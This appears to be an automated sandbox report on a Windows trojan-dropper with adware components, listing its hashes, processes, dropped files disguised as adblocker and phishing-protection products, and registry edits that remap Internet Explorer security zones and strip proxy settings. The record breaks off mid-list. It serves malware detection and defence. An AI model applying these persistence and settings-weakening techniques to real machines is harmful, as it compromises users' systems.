Skip to main content

Gen.Variant.Adware.MPlug.51_52eea08e05


Trojan-Dropper.Win32.Agent.bjapvx (Kaspersky), Gen:Variant.Adware.MPlug.51 (B) (Emsisoft), Gen:Variant.Adware.MPlug.51 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Backdoor, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 52eea08e054915129f2638d8012a38f6

SHA1: 2f798b0d3b656556e4d8932e7d0e2251ae541429

SHA256: 1c12146ea5115bb93a53344ebbdbe69ef42eff99e6e97c7eb39f29786d1c122a

SSDeep: 6144:HOMWpa2kA0PIfIyF7D1eUuKg6EizR3iT7:HloX8IfIW1eUh9ESsP

Size: 234496 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2012-10-25 08:28:59

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1304
%original file name%.exe:996
%original file name%.exe:592
%original file name%.exe:1936
%original file name%.exe:440
NybbleCrawler.xyz.exe:356
rundll32.exe:1256
regsvr32.exe:2008
regsvr32.exe:1784
hpds_setup.exe:164

The Trojan injects its code into the following process(es):

rundll32.exe:1016

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1304 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
%WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1.ini (0 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\8.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1_1.ini (0 bytes)

The process %original file name%.exe:996 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca (0 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70 (0 bytes)

The process %original file name%.exe:592 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2 (0 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af (0 bytes)

The process %original file name%.exe:1936 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
%Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\0903733f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e (0 bytes)

The process %original file name%.exe:440 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1993275e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca (0 bytes)

The process NybbleCrawler.xyz.exe:356 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (0 bytes)

Registry activity

The process %original file name%.exe:1304 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\79458114e3582eab]
"(Default)" = "inFHyxdfrqw4GcBCDWIpJp8qt5Hd57Gs5m8wkosDKDXTr426U5La6BI6Dq7kK2DlONq2NazNPHYy9pelh2ZT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\alpha_installer]
"rc" = "1"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\alpha_installer]
"fi" = "0"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\alpha_installer]
"du" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\alpha_installer]
"cr" = "13080200161088"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 EB 36 33 B2 53 8D 6A DF 46 E6 1E 29 46 1D 87"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:996 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"

"NoRepair" = "1"
"ProductName" = "bestadblocker"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "bestadblocker"
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
